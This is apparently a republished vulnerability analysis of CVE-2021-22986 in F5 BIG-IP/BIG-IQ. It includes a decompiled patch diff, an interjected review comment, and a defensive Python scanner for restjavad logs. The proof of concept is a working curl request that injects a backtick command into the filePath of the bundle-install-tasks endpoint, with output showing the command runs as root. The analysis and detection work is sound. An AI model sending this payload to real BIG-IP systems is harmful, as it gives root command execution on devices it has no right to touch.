CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE





        This vulnerability allows an unauthenticated attacker with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. It can only be exploited through the control plane, not the data plane. Exploitation can result in complete system compromise. BIG-IP systems in Appliance mode are also vulnerable.




CVE-2021-22986


        Judging from patch analysis and testing, this vulnerability appears to involve some form of authentication bypass, or even SSRF. The full-context patch below has had its line numbers adjusted for use in a debugger.


RCE


        This is a post-authentication root command injection into the tar(1) command.

Patch


        The filter is applied to the user-controlled taskState.filePath parameter.

[snip]+  private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$");[snip]   private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {     if (Utilities.isNullOrEmpty(taskState.filePath)) {       File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");       if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       File[] agcUseCasePack = agcUseCasePackDir.listFiles();       if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack."; failTask(taskState, error, ""); return; } taskState.filePath = agcUseCasePack[0].getPath(); }
+ String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);+ Matcher m = validFilePathChars.matcher(filename);+ if (!m.matches()) {+ String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });++++ failTask(taskState, errorMessage, "");++ return;+ } final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";

ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>() { public void completed(ShellExecutionResult extractQueryResult) { if (extractQueryResult.getExitStatus().intValue() != 0) { String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();

IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());

return; }

taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM; IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState); }

public void failed(Exception ex, ShellExecutionResult rpmQueryResult) { IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex)); } };


extractTar.startExecution(executionFinishedHandler); }[snip]
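Review bot: the unchanged line `final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";` still builds a shell command by string concatenation, and the new validFilePathChars check is applied only to the basename taken from `taskState.filePath.lastIndexOf('/') + 1`, so the safety of the whole command rests on that one regex; a more robust change would validate or canonicalise the entire path against the expected pack directory and hand tar its arguments as an argument array rather than a shell string, so that no path component is ever interpreted by a shell. Also, the pattern literal as shown (`\-`, `\s`, `\.`) would not compile as a Java string; the doubled backslashes were presumably dropped by the decompiler, which is worth keeping in mind when comparing this listing against the shipped jar.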


PoC


        The affected endpoint is /mgmt/tm/access/bundle-install-tasks.

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
  "filePath": "`id`",
  "toBeInstalledAppRpmsIndex": -1,
  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
  "generation": 1,
  "lastUpdateMicros": 1615930477819656,
  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu@kharak:~$


        The id(1) command runs as root:

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0


        An error may show up in /var/log/restjavad.0.log:

[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failed
org.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)
  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)
  at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)
  at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)
  at java.lang.Thread.run(Thread.java:748)
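The restjavad entry above is the artifact a defender is most likely to have, since the task's failure echoes the exact tar command, and therefore the submitted filePath, into the log. As an added example (not part of the original write-up and not F5's code), the following Python scans log lines of that shape, recovers the filePath that was concatenated into the command, and flags entries whose path contains shell metacharacters or does not satisfy the basename pattern introduced by the patch (re-escaped here for Python). The log format is assumed to follow the single entry shown on the page; the first sample line is that entry, the other two are constructed.

```python
import re

# Header of a restjavad entry, as in the sample on the page: [LEVEL][pid][timestamp][worker]
# (assumption: other entries in the file share this header layout).
LOG_HEADER = re.compile(r"^\[(?P<level>[A-Z]+)\]\[\d+\]\[(?P<ts>[^\]]+)\]\[(?P<worker>[^\]]+)\]")

# The failed command echoed after "error details:", from which the submitted filePath is recovered.
TAR_COMMAND = re.compile(r"error details: tar -xf (?P<path>.*?) -O > /dev/null failed")

# The patch's validFilePathChars regex, re-escaped for Python; the patch applies it to the basename only.
VALID_BASENAME = re.compile(r"^[a-zA-Z][a-zA-Z0-9_.\-\s()]*\.[tT][aA][rR]\.[gG][zZ]$")

# Characters that let a concatenated shell string run something other than tar.
SHELL_METACHARS = re.compile(r"[`$;|&<>\n]")


def analyze_line(line):
    """Return a finding dict for a bundle-install-tasks failure entry, or None for any other line."""
    cmd = TAR_COMMAND.search(line)
    if cmd is None:
        return None
    path = cmd.group("path")
    basename = path.rsplit("/", 1)[-1]
    header = LOG_HEADER.match(line)
    return {
        "timestamp": header.group("ts") if header else None,
        "file_path": path,
        "shell_metachars": SHELL_METACHARS.search(path) is not None,
        "basename_valid": VALID_BASENAME.match(basename) is not None,
    }


def is_suspicious(finding):
    """A filePath is suspicious if it carries shell metacharacters or fails the patch's pattern."""
    return finding["shell_metachars"] or not finding["basename_valid"]


def scan(lines):
    """Return the suspicious findings from an iterable of log lines, in file order."""
    findings = []
    for line in lines:
        finding = analyze_line(line)
        if finding is not None and is_suspicious(finding):
            findings.append(finding)
    return findings


# Constructed sample log: the first entry is the one shown on the page, the other two are made up.
SAMPLE_LOG = [
    "[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that "
    "usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failed",
    "[SEVERE][10030][16 Mar 2021 21:40:02 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that "
    "usecase pack is a valid tar archive. error details: tar -xf "
    "/var/apm/f5-iappslx-agc-usecase-pack/agc-usecase-pack-1.0.tar.gz -O > /dev/null failed",
    "[INFO][10031][16 Mar 2021 21:41:10 UTC][8100/shared/echo EchoWorker] Echo request completed",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['timestamp']}: suspicious filePath {finding['file_path']!r}")
```

Run against a real /var/log/restjavad.*.log the scan reports only the entries whose path would have been rejected by the patched validator or that carry shell syntax; a legitimate but corrupt use-case pack still produces the same SEVERE message, which is why the path itself, not the failure message, is what the check keys on.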



RCE update


        Rich Warren has built a full RCE chain using the SSRF.


References:

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986


This article first appeared on the WeChat official account Khan安全攻防实验室: CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE
